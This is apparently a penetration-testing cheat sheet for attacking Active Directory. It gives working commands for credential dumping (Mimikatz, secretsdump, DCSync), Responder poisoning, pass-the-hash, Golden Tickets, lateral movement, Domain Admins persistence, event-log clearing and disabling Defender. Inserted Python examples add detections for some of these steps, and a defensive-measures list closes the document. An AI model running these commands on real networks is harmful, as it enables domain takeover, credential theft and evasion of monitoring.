
What is Active Directory?
Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks. It’s widely used to manage permissions and access to network resources. Compromising AD can give attackers significant control over an organization’s infrastructure.
Pre-requisites for AD Hacking
- A foothold in the domain (typically via phishing, exploitation, or lateral movement).
- Credentials of a domain user account (low or high privilege).
- Tools like Impacket, BloodHound, Responder, Mimikatz, and CrackMapExec are crucial.
Reconnaissance and Enumeration
1. AD Domain Enumeration with net Commands
Use built-in Windows commands to gather basic domain information.
| Command | Description |
|---|---|
| net user /domain | List all users in the domain |
| net group /domain | List domain groups |
| net group "Domain Admins" /domain | List members of the Domain Admins group |
| net group "Enterprise Admins" /domain | List members of the Enterprise Admins group |
| net localgroup administrators | List local administrators on the current machine |
2. LDAP Enumeration with ldapdomaindump
ldapdomaindump is used to dump Active Directory information using LDAP.
ldapdomaindump -u 'domain/user' -p 'password' -d 192.168.1.100
This command will dump detailed information about the AD environment, including users, groups, computers, and GPOs.
3. AD Enumeration with BloodHound
BloodHound helps visualize AD relationships and find attack paths.
- Ingestor tool: SharpHound.ps1 or SharpHound.exe
- Run the tool from an AD-joined system to collect data:
Invoke-BloodHound -CollectionMethod All -DomainFQDN <domain> -ZipFilename <output>
Upload the ZIP file to the BloodHound interface and analyze AD attack paths.
Credential Harvesting
1. Dumping Hashes with Mimikatz
Mimikatz is a powerful tool for extracting credentials from memory.
mimikatz.exe
Once in Mimikatz, use the following commands:
| Command | Description |
|---|---|
| privilege::debug | Enable debug privilege (required for credential dumping) |
| sekurlsa::logonpasswords | Dump plaintext credentials and hashes from memory |
| lsadump::dcsync /user:Administrator | Perform a DCSync attack to dump password hashes from the domain controller |
2. NTLM Hash Dumping with Secretsdump (Impacket)
Impacket's secretsdump.py can be used to dump password hashes from a compromised system or Domain Controller.
secretsdump.py domain/<user>:<password>@<target_ip>
You can use NTLM hashes instead of passwords for authentication:
secretsdump.py -hashes <lm>:<nt> domain/<user>@<target_ip>
3. LLMNR/NBT-NS Poisoning with Responder
Responder captures NTLMv1/NTLMv2 hashes by poisoning LLMNR and NBT-NS requests.
sudo responder -I <interface>
- Wait for hashes to be captured, which can later be cracked using tools like hashcat.
Privilege Escalation Techniques
1. Pass-the-Hash (PTH) with CrackMapExec
CrackMapExec allows the use of NTLM hashes to authenticate without knowing the password (Pass-the-Hash attack).
crackmapexec smb <target_ip> -u <username> -H <NTLM_hash>
If the hash is valid, this will give you access to the target machine without needing the password.
2. Overpass-the-Hash (Pass-the-Key) with Mimikatz
Using NTLM hashes to get Kerberos tickets (TGT):
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:cmd
This provides a command prompt running as the user whose hash you possess.
3. DCSync Attack with Mimikatz
The DCSync attack simulates the behavior of a Domain Controller, allowing you to dump password hashes.
lsadump::dcsync /user:Administrator
This command retrieves the NTLM hash of any user, including privileged accounts like Domain Admins.
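Detection for the DCSync behaviour just described, added here as an example rather than the post's own material: it scans Security Event ID 4662 records for the two replication control-access rights and alerts on any principal other than an allowlisted domain controller account. The DC names and the sample events are constructed.

```python
import re

# Added example (not from the original post). Flags DCSync-style replication
# requests in Windows Security Event ID 4662 records: the two control-access
# right GUIDs below appear in the event's Properties field when a principal
# pulls directory changes, and only domain controller computer accounts (or a
# known sync account such as Azure AD Connect) should ever exercise them.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Assumed allowlist: the DC computer accounts of this constructed domain.
ALLOWED_REPLICATORS = {"DC01$", "DC02$"}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")


def is_dcsync_like(event):
    """True when a 4662 record shows a non-allowlisted account using replication rights."""
    if event.get("EventID") != 4662:
        return False
    guids = set(GUID_RE.findall(event.get("Properties", "").lower()))
    if not guids & REPLICATION_GUIDS:
        return False
    return event.get("SubjectUserName", "").upper() not in ALLOWED_REPLICATORS


def find_dcsync_alerts(events):
    """Return the records that look like DCSync activity."""
    return [ev for ev in events if is_dcsync_like(ev)]


# Constructed sample records using the field names of the 4662 event XML.
BOTH_RIGHTS = ("{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
               "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
SAMPLE_EVENTS = [
    # Routine inter-DC replication from an allowlisted computer account.
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectType": "domainDNS",
     "Properties": BOTH_RIGHTS},
    # A regular user exercising replication rights on the domain object.
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "domainDNS",
     "Properties": BOTH_RIGHTS},
    # Same user, some other GUID that is not a replication right.
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "user",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for ev in find_dcsync_alerts(SAMPLE_EVENTS):
        print(f"ALERT: {ev['SubjectUserName']} used replication rights on {ev['ObjectType']}")
```

Auditing of the domain object must be enabled for 4662 to be written at all, so check the SACL before relying on this rule.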
4. Golden Ticket Attack
Generate a Kerberos Golden Ticket using Mimikatz to impersonate any user, including Domain Admins:
kerberos::golden /user:<user> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /id:<RID> /target:<domain_controller>
- krbtgt_hash: You must extract the krbtgt hash before creating a Golden Ticket.
Lateral Movement Techniques
1. SMB Lateral Movement with CrackMapExec
Use CrackMapExec to execute commands on remote systems over SMB.
crackmapexec smb <target_ip> -u <user> -p <password> --exec-method smbexec --command "whoami"
2. Remote Code Execution with PsExec (Impacket)
Impacket's psexec.py can be used to execute commands on a remote machine via SMB.
psexec.py domain/<user>:<password>@<target_ip>
You can also use NTLM hashes with this:
psexec.py -hashes <lm>:<nt> domain/<user>@<target_ip>
3. WMI Execution with CrackMapExec
crackmapexec smb <target_ip> -u <user> -p <password> --exec-method wmiexec --command "whoami"
Persistence Techniques
1. Adding a User to Domain Admins Group
You can add a new user to the Domain Admins group to maintain persistence.
net user <username> <password> /add /domain
net group "Domain Admins" <username> /add /domain
2. Golden Ticket Persistence with Mimikatz
Golden Tickets can be generated and reused to maintain persistent access as any user (e.g., Domain Admin).
kerberos::golden /user:<user> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash>
Defensive Evasion
1. Clearing Event Logs with PowerShell
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
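A defender's view of the two steps above (the persistence section's Domain Admins addition and this section's log clearing), as an added example that is not part of the original post: it classifies Security events 4728/4732/4756 and 1102 and escalates when the same actor clears the log shortly after a privileged group change. Group names, actors and timestamps are constructed.

```python
from datetime import datetime, timedelta

# Added example (not from the original post). Two of the moves above leave
# loud Security-log traces: adding a member to a privileged group (4728 for
# global groups such as Domain Admins, 4756 universal, 4732 domain local) and
# clearing the Security log (1102, written even as the log is wiped). Records
# are constructed; TargetUserName is the group and MemberName the added DN.
WATCHED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}
GROUP_ADD_IDS = {4728, 4732, 4756}
LOG_CLEARED_ID = 1102

def classify(event):
    """Map one record to an alert kind, or None if it is not interesting."""
    eid = event["EventID"]
    if eid in GROUP_ADD_IDS and event.get("TargetUserName") in WATCHED_GROUPS:
        return "group-add"
    if eid == LOG_CLEARED_ID:
        return "log-cleared"
    return None

def detect(events, window=timedelta(hours=1)):
    """Return alert strings, escalating to CRITICAL when the same actor clears
    the Security log within `window` of a privileged group change."""
    alerts, recent_adds = [], []
    for ev in sorted(events, key=lambda x: x["Time"]):
        kind = classify(ev)
        if kind is None:
            continue
        actor, stamp = ev["SubjectUserName"], ev["Time"].strftime("%H:%M")
        if kind == "group-add":
            alerts.append(f"HIGH {stamp} {actor} added {ev['MemberName']} to {ev['TargetUserName']}")
            recent_adds.append((ev["Time"], actor))
        else:
            alerts.append(f"HIGH {stamp} {actor} cleared the Security log")
            if any(a == actor and ev["Time"] - t <= window for t, a in recent_adds):
                alerts.append(f"CRITICAL {stamp} {actor} cleared the log after a privileged group change")
    return alerts

# Constructed sample timeline: a user adds a service account to Domain Admins,
# an unrelated helpdesk change happens, then the same user clears the log.
T0 = datetime(2024, 3, 1, 10, 0)
SAMPLE_EVENTS = [
    {"EventID": 4728, "Time": T0 + timedelta(minutes=5), "SubjectUserName": "jdoe",
     "TargetUserName": "Domain Admins", "MemberName": "CN=svc-backup,CN=Users,DC=corp,DC=local"},
    {"EventID": 4728, "Time": T0 + timedelta(minutes=6), "SubjectUserName": "helpdesk",
     "TargetUserName": "Help Desk", "MemberName": "CN=asmith,CN=Users,DC=corp,DC=local"},
    {"EventID": 1102, "Time": T0 + timedelta(minutes=20), "SubjectUserName": "jdoe"},
]
```

Forwarding the Security log to a collector before it can be cleared is what makes the 1102 rule useful; a local-only log gives the attacker the last word.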
2. Disabling Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
3. Bypassing Antivirus with Mimikatz
Use obfuscation or AMSI bypass techniques to evade antivirus detection.
powershell -ep bypass
Defensive Measures Against AD Attacks
- Enforce Strong Password Policies: Use complex passwords, especially for privileged accounts.
- Monitor AD Event Logs: Track suspicious events like DCSync attempts, Golden Ticket usage, and lateral movement.
- Restrict Administrative Privileges: Use the principle of least privilege for all accounts.
- Use Multi-factor Authentication (MFA): Especially for sensitive accounts like Domain Admins.
- Regularly Rotate krbtgt Key: To protect against Golden Ticket attacks.
- Disable Unnecessary Services: Disable LLMNR and NBT-NS to prevent Responder attacks.
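For the krbtgt rotation item in the list above, an added example (not from the original post): it reads the krbtgt account's pwdLastSet FILETIME, ages it against an assumed 180-day policy, and counts the post-compromise resets needed before a Golden Ticket forged with the old hash stops working. All sample values are constructed.

```python
from datetime import datetime, timedelta, timezone

# Added example (not from the original post). The krbtgt account's pwdLastSet
# attribute is a Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC).
# Two checks worth running against it: is the key older than policy allows,
# and, after a suspected krbtgt compromise, have enough resets happened? The
# KDC still accepts tickets encrypted with the previous key, so a Golden Ticket
# minted from a stolen hash keeps working until the key has been reset twice.
# All values below are constructed; the 180-day policy is an assumption.
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
MAX_TGT_LIFETIME = timedelta(hours=10)  # default Kerberos policy for a domain

def filetime_to_datetime(filetime):
    """Convert a FILETIME integer (as returned over LDAP) to an aware UTC datetime."""
    return EPOCH_1601 + timedelta(microseconds=filetime // 10)

def krbtgt_status(pwd_last_set, now, max_age=timedelta(days=180)):
    """Age the krbtgt key and report whether it is past the rotation policy."""
    last_set = filetime_to_datetime(pwd_last_set)
    age = now - last_set
    return {"last_set": last_set, "age_days": age.days, "overdue": age > max_age}

def resets_still_needed(reset_times, compromise_time):
    """Resets still required before tickets forged with a key stolen at
    `compromise_time` stop being accepted (two are needed in total)."""
    done = sum(1 for t in reset_times if t > compromise_time)
    return max(0, 2 - done)

def resets_too_close(reset_times):
    """True if two consecutive resets are closer than the max TGT lifetime, which
    also invalidates legitimate tickets issued under the earlier key."""
    times = sorted(reset_times)
    return any(b - a < MAX_TGT_LIFETIME for a, b in zip(times, times[1:]))

# Constructed sample: pwdLastSet for 2024-01-01 00:00 UTC, checked on 2024-09-01,
# with a suspected compromise on 2024-06-01 followed by two resets a day apart.
SAMPLE_PWD_LAST_SET = 133485408000000000
NOW = datetime(2024, 9, 1, tzinfo=timezone.utc)
SUSPECTED_COMPROMISE = datetime(2024, 6, 1, tzinfo=timezone.utc)
SAMPLE_RESETS = [datetime(2024, 6, 2, 9, tzinfo=timezone.utc),
                 datetime(2024, 6, 3, 9, tzinfo=timezone.utc)]
```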